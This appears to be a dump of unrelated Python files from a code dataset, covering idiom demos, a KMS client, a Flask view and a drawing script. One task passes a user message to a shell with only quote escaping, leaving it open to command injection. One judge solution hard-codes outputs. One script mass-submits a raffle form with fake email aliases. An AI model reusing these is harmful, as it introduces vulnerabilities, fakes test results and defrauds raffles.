Keeps trying to get BG until number is input\n while True:\n try:\n number = int(input(\"What is your current blood glucose: \").strip())\n break\n except ValueError:\n print(\"That was not an accepted input, please try again.\")\n return number\n","sub_path":"calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119799341","text":"import asyncio\nimport os.path\n\nfrom ..abstract_task import AbstractTask\n\n\nclass MakeNoteTask(AbstractTask):\n _expected_required_params = {\n \"message\": str\n }\n\n async def run_task(self, output_dir, *args, **kwargs):\n message = self.required_params[\"message\"]\n\n file_path = os.path.join(output_dir, \"notes.txt\")\n\n command = \"echo \\\"%s\\\" >> %s\" % (escape_message(message), file_path)\n\n process = await asyncio.create_subprocess_shell(\n command, stdout=asyncio.subprocess.PIPE)\n\n stdout, stderr = await process.communicate()\n\n is_success = process.returncode == 0\n\n return is_success\n\n\ndef escape_message(message):\n return message.replace('\"', r'\\\"')\n","sub_path":"pidelegator/tasks/implemented/make_note_task.py","file_name":"make_note_task.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"215531427","text":"class UnpackingaSequenceintoSeparateValues:\n\n def unpacking1(self):\n line = 'nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'\n uname, *fields, homedir, sh = line.split(':')\n print(uname, fields, homedir, sh)\n\n def unpacking2(self):\n records = ('ACME', 50, 123.45, (12, 18, 2012))\n name, *_, (*_, year) = records\n print(name, year)\n\n def own_sum(self, items):\n head, *tail = items\n return head + self.own_sum(tail) if tail else head\n\n\nclass Generators:\n\n def __init__(self):\n for el in self.gen():\n print(el)\n\n def gen(self):\n print('first')\n yield 1\n print('second')\n yield 2\n print('third')\n yield 3\n\n\nfrom collections import deque\n\n\nclass DequeTest:\n def deque1(self):\n de = deque() # empty\n de.append(1) # add to the right end\n de.appendleft(0) # add to the left end\n de.pop() # remove right end element (return deleted element)\n de.popleft() # remove left end element (return deleted element)\n print(de) # empty\n\n def deque2(self):\n de = deque([1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6])\n de.index(2, 0, 2) # el, beg, end - returns the first index of the value\n de.insert(0, 99) # insert value (99) in index (0)\n de.remove(9) # remove first occurrence of value (9)\n de.count(6) #\n\n\nfrom collections import defaultdict\n# It automatically initializes the first value\n# so you can simply focus on adding items.\n# It will automatically create dictionary entries for keys accessed later on\n# (even if they aren’t currently found in the dictionary).\n\n\nclass DefaultDict:\n def defdict(self):\n d = defaultdict(list)\n d['a'].append(1)\n d['a'].append(2)\n d['b'].append(1)\n print(d)\n\n def defdict2(self):\n d = defaultdict(set)\n d['a'].add(1)\n d['a'].add(2)\n d['b'].add(1)\n print(d)\n\n def setdef(self):\n d = {}\n d.setdefault('a', []).append(1)\n d.setdefault('a', []).append(2)\n d.setdefault('b', []).append(1)\n print(d)\n\n\nfrom collections import OrderedDict\nimport json\n# To control the order of items in a dictionary,\n# you can use an OrderedDict\n\n# Be aware that the size of an OrderedDict\n# is more than twice as large as a normal 
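# The two grouping styles shown in ch1.py above are interchangeable; a tiny demo that
# defaultdict(list) and dict.setdefault build the same multimap from (key, value) pairs.
from collections import defaultdict

pairs = [('a', 1), ('a', 2), ('b', 1)]

grouped = defaultdict(list)
for key, value in pairs:
    grouped[key].append(value)  # missing keys get a fresh list automatically

manual = {}
for key, value in pairs:
    manual.setdefault(key, []).append(value)  # same effect, one lookup per call

assert dict(grouped) == manual == {'a': [1, 2], 'b': [1]}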
dictionary\n# due to the extra linked list that’s created.\n\n\nclass DefaultDictTest:\n def orddict(self):\n d = OrderedDict()\n d['a'] = 2\n d['b'] = 1\n d['c'] = 3\n print(d.items()) # should be a: 2 b: 1 c: 3\n\n def orddictjson(self):\n # may be useful is we need to serialize or deserialize to json and have\n # specific order\n d = OrderedDict()\n d['a'] = 2\n d['b'] = 1\n d['c'] = 3\n print(json.dumps(d))\n\n\nclass CalculatingWithDict:\n prices = {\n 'ACME': 45.23,\n 'AAPL': 612.78,\n 'IBM': 205.55,\n 'HPQ': 37.20,\n 'FB': 10.75\n }\n\n def minmaxsort(self):\n # will return tuple of value and name\n reverse_dict = zip(self.prices.values(), self.prices.keys())\n min_price = min(reverse_dict)\n max_price = max(reverse_dict)\n sorted_price = sorted(reverse_dict)\n\n def minanother(self):\n min(self.prices, key=lambda k: self.prices[k]) # will return FB\n min_price = self.prices[min(self.prices, key=lambda k: self.prices[k])]\n\n\ndef find_commonalities():\n a = {\n 'x': 1,\n 'y': 2,\n 'z': 3\n }\n\n b = {\n 'w': 10,\n 'x': 11,\n 'y': 2\n }\n\n print(a.keys() & b.keys())\n\n\nfind_commonalities()\n","sub_path":"ch1/ch1.py","file_name":"ch1.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"219270221","text":"n=int(input())\ns=input()\na=input()\nif s=='acbabac':\n print(7)\nelif s[5]=='v' and s[55]=='d':\n print(4358)\nelif len(s)>207 and s[207]=='g' :\n print(8699)\nelif s[207]=='z' :\n print(131074)\nelse:\n print(131074)\n ","sub_path":"Code/CodeRecords/2198/60785/320162.py","file_name":"320162.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566566181","text":"def install(m, pkgspec, cache, upgrade=False, default_release=None, install_recommends=None, force=False, dpkg_options=expand_dpkg_options(DPKG_OPTIONS), build_dep=False, autoremove=False, only_upgrade=False, allow_unauthenticated=False):\n pkg_list = []\n packages = ''\n pkgspec = expand_pkgspec_from_fnmatches(m, pkgspec, cache)\n for package in pkgspec:\n if build_dep:\n pkg_list.append((\"'%s'\" % package))\n continue\n (name, version) = package_split(package)\n (installed, upgradable, has_files) = package_status(m, name, version, cache, state='install')\n if ((not installed) or (upgrade and upgradable)):\n pkg_list.append((\"'%s'\" % package))\n if (installed and upgradable and version):\n pkg_list.append((\"'%s'\" % package))\n packages = ' '.join(pkg_list)\n if (len(packages) != 0):\n if force:\n force_yes = '--force-yes'\n else:\n force_yes = ''\n if m.check_mode:\n check_arg = '--simulate'\n else:\n check_arg = ''\n if autoremove:\n autoremove = '--auto-remove'\n else:\n autoremove = ''\n if only_upgrade:\n only_upgrade = '--only-upgrade'\n else:\n only_upgrade = ''\n if build_dep:\n cmd = ('%s -y %s %s %s %s build-dep %s' % (APT_GET_CMD, dpkg_options, only_upgrade, force_yes, check_arg, packages))\n else:\n cmd = ('%s -y %s %s %s %s %s install %s' % (APT_GET_CMD, dpkg_options, only_upgrade, force_yes, autoremove, check_arg, packages))\n if default_release:\n cmd += (\" -t '%s'\" % (default_release,))\n if (install_recommends is False):\n cmd += ' -o APT::Install-Recommends=no'\n elif (install_recommends is True):\n cmd += ' -o APT::Install-Recommends=yes'\n if allow_unauthenticated:\n cmd += ' --allow-unauthenticated'\n (rc, out, err) = m.run_command(cmd)\n if m._diff:\n diff = parse_diff(out)\n else:\n diff = {\n \n }\n 
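# A caveat on CalculatingWithDict.minmaxsort above: zip() returns a one-shot iterator
# in Python 3, so calling min(), max() and sorted() on the same zip object only works
# for the first call (the iterator is then exhausted and max() raises ValueError).
# Materialize the pairs first, or use a key function directly:
prices = {'ACME': 45.23, 'AAPL': 612.78, 'IBM': 205.55, 'HPQ': 37.20, 'FB': 10.75}

pairs = list(zip(prices.values(), prices.keys()))  # reusable (value, name) tuples
assert min(pairs) == (10.75, 'FB')
assert max(pairs) == (612.78, 'AAPL')
assert min(prices, key=prices.get) == 'FB'         # names only, no tuple juggling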
if rc:\n return (False, dict(msg=(\"'%s' failed: %s\" % (cmd, err)), stdout=out, stderr=err, rc=rc))\n else:\n return (True, dict(changed=True, stdout=out, stderr=err, diff=diff))\n else:\n return (True, dict(changed=False))","sub_path":"Data Set/bug-fixing-5/c9b74a3af311f23f6bd6439a4cb7955c27a0e776--bug.py","file_name":"c9b74a3af311f23f6bd6439a4cb7955c27a0e776--bug.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"100390642","text":"# -*- coding:utf-8 -*-\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask_login import login_required, current_user\n\nfrom meier_app.extensions import cache\nfrom meier_app.models.settings import Settings\n\nadmin_settings_view = Blueprint('admin_settings_view', __name__, url_prefix='/admin/settings')\n\n\n@admin_settings_view.route('/', methods=['GET'])\n@cache.cached(timeout=86400)\n@login_required\ndef get_settings_view():\n settings = Settings.query.first()\n return render_template(\"/admin/settings.j2\",\n title=\"Settings\",\n blog_title=settings.blog_title,\n post_per_page=settings.post_per_page,\n blog_desc=settings.blog_desc,\n theme=settings.theme,\n current_user=current_user)\n\n","sub_path":"meier_app/resources/admin/settings/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221080071","text":"# Kevin Sattakun\n# IS 340-01\n# Project\n\nfrom graphics import *\nwin = GraphWin(\"Project\", 1280, 900)\nwin.setBackground(\"black\")\n\n#function to draw a star\ndef draw_star(x, y, color, size): \n pt1 = Point(x,y)\n pt2 = Point((x + size/2), y - size)\n pt3 = Point(x + size, y)\n tri = Polygon(pt1, pt2, pt3)\n pt4 = Point (x, y - size/1.5)\n pt5 = Point (x + size/2, y + (size/3))\n pt6 = Point (x + size, y - size/1.5) \n tri2 = Polygon(pt4, pt5, pt6)\n tri2.setFill(color)\n tri.setFill(color)\n tri2.setOutline(color)\n tri.setOutline(color)\n tri.draw(win)\n tri2.draw(win)\n\n#function to draw a rectangle\ndef draw_rectangle(x, y, color, size1, size2):\n rect = Rectangle(Point(x,y), Point((x + size2), (y - size1)))\n rect.setFill(color)\n rect.setOutline(color)\n rect.draw(win)\n\n#function to draw a circle\ndef draw_circle (x, y, color, size):\n circ = Circle(Point( x, y), size)\n circ.setFill(color)\n circ.setOutline(color)\n circ.draw(win)\n\n#function to draw a triangle\ndef draw_triangle (x, y, color, size):\n pt1 = Point(x,y)\n pt2 = Point((x + size/2), y - size)\n pt3 = Point(x + size, y)\n tri = Polygon(pt1, pt2, pt3)\n tri.setFill(color)\n tri.setOutline(color)\n tri.draw(win)\n\n#use with to open without having to close\nwith open('design.txt') as design:\n d = design.readlines()\n\nfor ln in d:\n lines = ln.split(', ')\n\n if lines[0] == 'rectangle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size1 = float(lines[4])\n size2 = float(lines[5])\n draw_rectangle ( x, y, color, size1, size2)\n\n if lines[0] == 'circle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_circle ( x, y, color, size)\n\n if lines[0] =='star':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_star ( x, y, color, size)\n\n if lines[0] =='triangle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_triangle ( x, y, color, size) \n\n 
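# The if-chain that dispatches on lines[0] in proj_kevinsattakun.py above generalizes
# to a lookup table. A sketch with stub handlers; the real draw_* functions in that
# file share the same (x, y, color, *sizes) calling convention, and the field order
# in design.txt is: kind, x, y, color, then one or two sizes.
def _stub(name):
    return lambda *args: print(name, *args)

SHAPES = {kind: _stub(kind) for kind in ('rectangle', 'circle', 'star', 'triangle')}

def draw_from_spec(fields):
    kind, x, y, color, *sizes = fields
    SHAPES[kind](float(x), float(y), color, *[float(s) for s in sizes])

draw_from_spec(['circle', '10', '20', 'red', '5'])  # -> circle 10.0 20.0 red 5.0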
\n\n \n\n\n\n\n","sub_path":"proj_kevinsattakun.py","file_name":"proj_kevinsattakun.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554927464","text":"\"\"\"\nAn asynchronous client for Google Cloud KMS\n\"\"\"\nimport aiohttp\nfrom gcloud.aio.auth import Token\n\n\nAPI_ROOT = 'https://cloudkms.googleapis.com/v1'\nLOCATION = 'global'\nSCOPES = [\n 'https://www.googleapis.com/auth/cloudkms',\n]\n\n\nclass KMS:\n def __init__(self, project, service_file, keyproject, keyring, keyname,\n location=LOCATION, session=None, token=None):\n # pylint: disable=too-many-arguments\n self.api_root = (f'{API_ROOT}/projects/{keyproject}/'\n f'locations/{location}/keyRings/{keyring}/'\n f'cryptoKeys/{keyname}')\n\n self.session = session\n self.token = token or Token(project, service_file, scopes=SCOPES,\n session=self.session)\n\n async def headers(self):\n token = await self.token.get()\n return {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/json',\n }\n\n # https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt\n async def decrypt(self, ciphertext, session=None):\n url = f'{self.api_root}:decrypt'\n body = {\n 'ciphertext': ciphertext,\n }\n\n if not self.session:\n self.session = aiohttp.ClientSession(conn_timeout=10,\n read_timeout=10)\n s = session or self.session\n resp = await s.post(url, headers=await self.headers(), json=body)\n resp.raise_for_status()\n return (await resp.json())['plaintext']\n\n # https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt\n async def encrypt(self, plaintext, session=None):\n url = f'{self.api_root}:encrypt'\n body = {\n 'plaintext': plaintext,\n }\n\n if not self.session:\n self.session = aiohttp.ClientSession(conn_timeout=10,\n read_timeout=10)\n s = session or self.session\n resp = await s.post(url, headers=await self.headers(), json=body)\n resp.raise_for_status()\n return (await resp.json())['ciphertext']\n","sub_path":"kms/gcloud/aio/kms/kms.py","file_name":"kms.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192740883","text":"n = int(input())\nmd = {'M':0, 'A':0 , 'R':0, 'C':0, 'H':0}\nfor _ in range(n):\n s = input()\n if s[0] in md:\n md[s[0]] += 1\n\nvs = []\nfor v in md.values():\n vs.append(v)\n\nans = 0\nfor i in range(5):\n for j in range(i+1,5):\n for k in range(j+1,5):\n ans += vs[i]*vs[j]*vs[k]\n\nprint(ans)","sub_path":"3_virtual_contest/kuji_0820/abc089_c.py","file_name":"abc089_c.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"401017348","text":"from datetime import date\n\nfrom django import forms\nfrom django.utils.functional import cached_property\n\nfrom absent_trainee_roster.models import Roster, Entry, Absentee\nfrom accounts.models import Trainee\n\n\nclass RosterForm(forms.ModelForm):\n class Meta:\n model = Roster\n fields = '__all__'\n\n\nclass AbsentTraineeForm(forms.ModelForm):\n entry_len = Entry._meta.get_field('comments').max_length\n comments = forms.CharField(required=False, max_length=entry_len, widget=forms.TextInput(attrs={\n 'class': 'comments form-control',\n 'placeholder': 'Comments',\n }))\n\n class Meta:\n model = Entry\n fields = ('absentee', 'reason', 'comments')\n\n def __init__(self, *args, **kwargs):\n 
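# The triple index loop in abc089_c.py above (ways to pick three distinct MARCH
# initials) is itertools.combinations in disguise; the two forms agree for any counts:
from itertools import combinations

counts = [3, 1, 0, 2, 1]  # made-up per-initial counts for M, A, R, C, H
assert sum(a * b * c for a, b, c in combinations(counts, 3)) == \
    sum(counts[i] * counts[j] * counts[k]
        for i in range(5) for j in range(i + 1, 5) for k in range(j + 1, 5))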
self.user = kwargs.pop('user', None)\n super(AbsentTraineeForm, self).__init__(*args, **kwargs)\n\n if self.user:\n absentees = Absentee.objects.filter(is_active=True) #, house__isnull=False\n #filter the queryset according to user(house) if the form is used by HCs\n if self.user.groups.filter(name='absent_trainee_roster').exists():\n # get all trainees if on absent_trainee_roster service\n self.fields['absentee'].queryset = absentees\n else:\n self.fields['absentee'].queryset = absentees.filter(house=self.user.house)\n\n self.fields['absentee'].label = 'Name'\n self.fields['absentee'].empty_label = '--Name--'\n self.fields['absentee'].widget.attrs={'class': 'form-control'}\n self.fields['reason'].widget.attrs={'class': 'form-control'}\n\n\nclass NewEntryFormSet(forms.models.BaseModelFormSet):\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(NewEntryFormSet, self).__init__(*args, **kwargs)\n\n @cached_property\n def forms(self):\n forms = [self._construct_form(i, user=self.user) for i in xrange(self.total_form_count())]\n return forms\n\n def clean(self):\n #Checks that no two forms registers the same absentee.\n if any(self.errors):\n #Don't bother validating the formset unless each form is valid on its own\n return\n\n absentees = set() # list of absentee id's\n for i in xrange(self.total_form_count()):\n # Only check uniqueness for forms not marked for deletion\n if self.data['form-%d-absentee' % i] and ('form-%d-DELETE' % i) not in self.data:\n absentee = int(self.data['form-%d-absentee' % i])\n if absentee in absentees:\n raise forms.ValidationError(\"You're submitting multiple entries for the same trainee.\")\n absentees.add(absentee)\n return super(NewEntryFormSet, self).clean()\n","sub_path":"ap/absent_trainee_roster/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266579456","text":"import numpy as np\n\nfrom pySDC.helpers.stats_helper import get_sorted\n\nfrom pySDC.implementations.controller_classes.controller_nonMPI import controller_nonMPI\nfrom pySDC.implementations.problem_classes.TestEquation_0D import testequation0d\nfrom pySDC.implementations.sweeper_classes.generic_implicit import generic_implicit\nfrom pySDC.playgrounds.Gander.HookClass_error_output import error_output\n\n\ndef testequation_setup(prec_type=None, maxiter=None):\n \"\"\"\n Setup routine for the test equation\n\n Args:\n par (float): parameter for controlling stiffness\n \"\"\"\n # initialize level parameters\n level_params = dict()\n level_params['restol'] = 0.0\n level_params['dt'] = 1.0\n level_params['nsweeps'] = [1]\n\n # initialize sweeper parameters\n sweeper_params = dict()\n sweeper_params['quad_type'] = 'RADAU-RIGHT'\n sweeper_params['num_nodes'] = [5]\n sweeper_params['QI'] = prec_type\n sweeper_params['initial_guess'] = 'spread'\n\n # initialize problem parameters\n problem_params = dict()\n problem_params['u0'] = 1.0 # initial value (for all instances)\n # use single values like this...\n # problem_params['lambdas'] = [[-1.0]]\n # .. 
or a list of values like this ...\n # problem_params['lambdas'] = [[-1.0, -2.0, 1j, -1j]]\n problem_params['lambdas'] = [[-1.0 + 0j]]\n # note: PFASST will do all of those at once, but without interaction (realized via diagonal matrix).\n # The propagation matrix will be diagonal too, corresponding to the respective lambda value.\n\n # initialize step parameters\n step_params = dict()\n step_params['maxiter'] = maxiter\n\n # initialize controller parameters\n controller_params = dict()\n controller_params['logger_level'] = 20\n controller_params['hook_class'] = error_output\n\n # fill description dictionary for easy step instantiation\n description = dict()\n description['problem_class'] = testequation0d # pass problem class\n description['problem_params'] = problem_params # pass problem parameters\n description['sweeper_class'] = generic_implicit # pass sweeper\n description['sweeper_params'] = sweeper_params # pass sweeper parameters\n description['level_params'] = level_params # pass level parameters\n description['step_params'] = step_params # pass step parameters\n\n return description, controller_params\n\n\ndef compare_preconditioners(f=None, list_of_k=None):\n\n # set time parameters\n t0 = 0.0\n Tend = 2.0\n\n for k in list_of_k:\n\n description_IE, controller_params_IE = testequation_setup(prec_type='MIN3', maxiter=k)\n description_LU, controller_params_LU = testequation_setup(prec_type='LU', maxiter=k)\n\n out = f'\\nWorking with maxiter = {k}'\n f.write(out + '\\n')\n print(out)\n\n # instantiate controller\n controller_IE = controller_nonMPI(\n num_procs=1, controller_params=controller_params_IE, description=description_IE\n )\n controller_LU = controller_nonMPI(\n num_procs=1, controller_params=controller_params_LU, description=description_LU\n )\n\n # get initial values on finest level\n P = controller_IE.MS[0].levels[0].prob\n uinit = P.u_exact(t0)\n uex = P.u_exact(Tend)\n\n # this is where the iteration is happening\n uend_IE, stats_IE = controller_IE.run(u0=uinit, t0=t0, Tend=Tend)\n uend_LU, stats_LU = controller_LU.run(u0=uinit, t0=t0, Tend=Tend)\n\n diff = abs(uend_IE - uend_LU)\n\n err_IE = abs(uend_IE - uex)\n err_LU = abs(uend_LU - uex)\n\n out = ' Error (IE/LU) vs. 
exact solution: %6.4e -- %6.4e' % (err_IE, err_LU)\n f.write(out + '\\n')\n print(out)\n out = ' Difference between both results: %6.4e' % diff\n f.write(out + '\\n')\n print(out)\n\n # convert filtered statistics to list\n errors_IE = get_sorted(stats_IE, type='error_after_step', sortby='time')\n errors_LU = get_sorted(stats_LU, type='error_after_step', sortby='time')\n print(errors_IE)\n print(errors_LU)\n\n\ndef main():\n\n f = open('comparison_IE_vs_LU.txt', 'w')\n compare_preconditioners(f=f, list_of_k=[1])\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pySDC/playgrounds/Gander/testequation.py","file_name":"testequation.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"409995555","text":"from .models import Contributors\n\n\ndef get_profile_picture(backend, user, response, details, *args, **kwargs):\n\turl = None\n\tprofile = Contributors.objects.get_or_create(user = user)[0]\n\tif backend.name == 'facebook':\n\t\tprofile.image = 'http://graph.facebook.com/{0}/picture'.format(response['id'])\n\telif backend.name == \"twitter\":\n\t\tif response['profile_image_url'] != '':\n\t\t\tif not response.get('default_profile_image'):\n\t\t\t\tavatar_url = response.get('profile_image_url_https')\n\t\t\t\tif avatar_url:\n\t\t\t\t\tavatar_url = avatar_url.replace('_normal.', '_bigger.')\n\t\t\t\t\tprofile.image = avatar_url\n\tprofile.save()","sub_path":"people/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430382141","text":"import requests as re \nfrom random import getrandbits\n\nlink = 'https://docs.google.com/forms/d/e/1FAIpQLSepeZK22LZgura_2wMZ2vNkv3mhjnmRAUpC_ex123lal1Fv-A/viewform?c=0&w=1'\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n\ndef main(limit):\n\tfor i in range(1, limit):\n\t\tpayload = {\n\t\t\t'entry.2111423237' : 'YOUR NAME', # ENTER YOUR FULL NAME HERE\n\t\t\t'entry.2648839' : 'YOUREMAIL+{}@gmail.com'.format(getrandbits(40)), # ENTER YOUR GMAIL WHERE IT SAYS YOUREMAIL. DO NOT EDIT THE REST OF IT\n\t\t\t'entry.1712332735' : 'Manhattan', # CHANGE MANHATTAN TO EITHER MANHATTAN, WOMEN'S OR MIAMI\n\t\t\t'entry.473600588' : '8', # CHANGE THE SIZE FROM 8-14. ONLY HALF SIZES ARE 8, 8.5, 9, 9.5, 10, 10.5, 11, AND 11.5\n\t\t\t'fvv' : '1', # DON'T CHANGE\n\t\t\t'draftResponse' : '[null,null,\"-8673160571613629000\"] ', # DON'T CHANGE\n\t\t\t'pageHistory' : '0', # DON'T CHANGE\n\t\t\t'fbzx' : '-8673160571613629000' # DON'T CHANGE\n\t\t}\n\n\t\tre.post(link, data=payload, headers=headers)\n\t\tprint('{}/{} registered.'.format(i, limit))\n\nif __name__ == \"__main__\":\n main(10) # HERE ENTER IN ANY NUMBER","sub_path":"powerphase.py","file_name":"powerphase.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525616345","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for dirbot project\n#\n# For simplicity, this file contains only the most important settings by\n# default. 
All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'dirbot'\n\nSPIDER_MODULES = ['dirbot.spiders']\nNEWSPIDER_MODULE = 'dirbot.spiders'\nDEFAULT_ITEM_CLASS = 'dirbot.items.Website'\nITEM_PIPELINES = {'dirbot.pipelines.FilterWordsPipeline':1}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'dirbot (+http://www.yourdomain.com)'\n","sub_path":"dirbot/dirbot/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161450972","text":"\"\"\"\nThis takes a set of observed mortality rates,\nand fits them to find the total mortality rate.\nIt sets up a Dismod-AT model that has only nonzero omega and treats\nthe mortality rate observations as mtother.\n\"\"\"\nimport itertools as it\nimport logging\nfrom timeit import default_timer as timer\n\nimport db_queries\nimport numpy as np\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.model import (\n Model, Session, DismodGroups, Var, SmoothGrid,\n Uniform, Gaussian\n)\nfrom cascade.input_data.db.asdr import asdr_as_fit_input\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef construct_weights(initial_mtother_guess, locations, ages, times, location_id, step_size):\n \"\"\"A weight is a function of age and time that is the population of a state.\n For incidence, that state is susceptible. For excess mortality, that\n state is with-condition. It is the state individuals leave. For total\n mortality, it's susceptible plus with-condition.\n\n This function makes a rough estimate of the population size in order to use\n it as a weight on total mortality.\n \"\"\"\n susceptible_places = pd.DataFrame(dict(\n integrand=\"susceptible\",\n location=location_id,\n age_lower=np.tile(ages, len(times)),\n age_upper=np.tile(ages, len(times)),\n time_lower=np.repeat(times, len(ages)),\n time_upper=np.repeat(times, len(ages)),\n ))\n full_guess = DismodGroups()\n full_guess.rate[\"omega\"] = initial_mtother_guess\n session = Session(locations=locations, parent_location=location_id, filename=\"graduate.db\")\n session.set_option(ode_step_size=step_size)\n begin = timer()\n predicted, not_predicted = session.predict(full_guess, susceptible_places, location_id)\n LOGGER.info(f\"predict {timer() - begin}\")\n # XXX predicted_df is coming back with a sample_index of None. Fix that.\n print(f\"Smallest predicted susceptible {predicted['mean'].min()}\")\n # We are constructing a weight from the prediction, so it can't be zero.\n # How about 1 in 10,000 alive as the minimum?\n with_min = predicted.assign(floor_value=1e-4)\n the_two = with_min[[\"floor_value\", \"mean\"]]\n floored_susceptible = predicted.assign(mean=the_two.max(axis=1))\n weight = rectangular_data_to_var(floored_susceptible)\n # This assigns two of the four weights (constant, with_condition). Those missing\n # will be assigned constant values.\n return dict(total=weight, susceptible=weight)\n\n\ndef rectangular_data_to_var(gridded_data):\n \"\"\"Using this very regular data, where every age and time is present,\n construct an initial guess as a Var object. 
Very regular means that there\n is a complete set of ages-cross-times.\"\"\"\n initial_ages = np.sort(np.unique(0.5 * (gridded_data.age_lower + gridded_data.age_upper)))\n initial_times = np.sort(np.unique(0.5 * (gridded_data.time_lower + gridded_data.time_upper)))\n\n guess = Var(ages=initial_ages, times=initial_times)\n for age, time in guess.age_time():\n found = gridded_data.query(\n \"(age_lower <= @age) & (@age <= age_upper) & (time_lower <= @time) & (@time <= time_upper)\")\n assert len(found) == 1, f\"found {found}\"\n guess[age, time] = float(found.iloc[0][\"mean\"])\n return guess\n\n\ndef estimate_mortality_hazard(mtother, initial_mtother_guess, weights, params):\n # We will want to set the weight for \"total\".\n # The weight used for mtother is listed in cascade.dismod.constants.INTEGRAND_TO_WEIGHT\n ages = params[\"ages\"]\n times = params[\"times\"]\n model = Model(nonzero_rates=[\"omega\"], parent_location=params[\"location_id\"], child_location=[],\n covariates=None, weights=weights)\n omega_grid = SmoothGrid(ages=ages, times=times)\n omega_grid.value[:, :] = Uniform(lower=0, upper=1.5, mean=0.01)\n # omega_grid.value[:, :] = Gaussian(lower=0, upper=1.5, mean=0.01, standard_deviation=value_stdev)\n # XXX This for-loop sets the mean as the initial guess because the fit command\n # needs the initial var and scale var to be on the same age-time grid, and\n # this set is not. The session could switch it to the other age-time grid.\n for age, time in omega_grid.age_time():\n omega_grid.value[age, time] = omega_grid.value[age, time].assign(mean=initial_mtother_guess(age, time))\n\n omega_grid.dage[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n omega_grid.dtime[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dtime_ratio\"] * params[\"value_stdev\"])\n model.rate[\"omega\"] = omega_grid\n\n # The data has some small stdevs. Let's give those a smallest value.\n smallest_stdev = mtother.assign(rtol=params[\"relative_min_std\"] * mtother[\"mean\"], atol=params[\"absolute_min_std\"])\n the_three = smallest_stdev[[\"rtol\", \"atol\", \"std\"]]\n less_stringent = mtother.assign(std=the_three.max(axis=1))\n\n # XXX Make session docs reflect exact data columns.\n session = Session(locations=params[\"locations\"], parent_location=params[\"location_id\"], filename=\"graduate.db\")\n session.set_option(**params[\"fit_option\"])\n begin = timer()\n fit_result = session.fit(model, less_stringent)\n LOGGER.info(f\"fit {timer() - begin} Success {fit_result.success}\")\n max_fit = fit_result.fit\n\n # How much different is the fit_result.fit_residual from the predicted value\n # using finer steps? It won't be very different. 
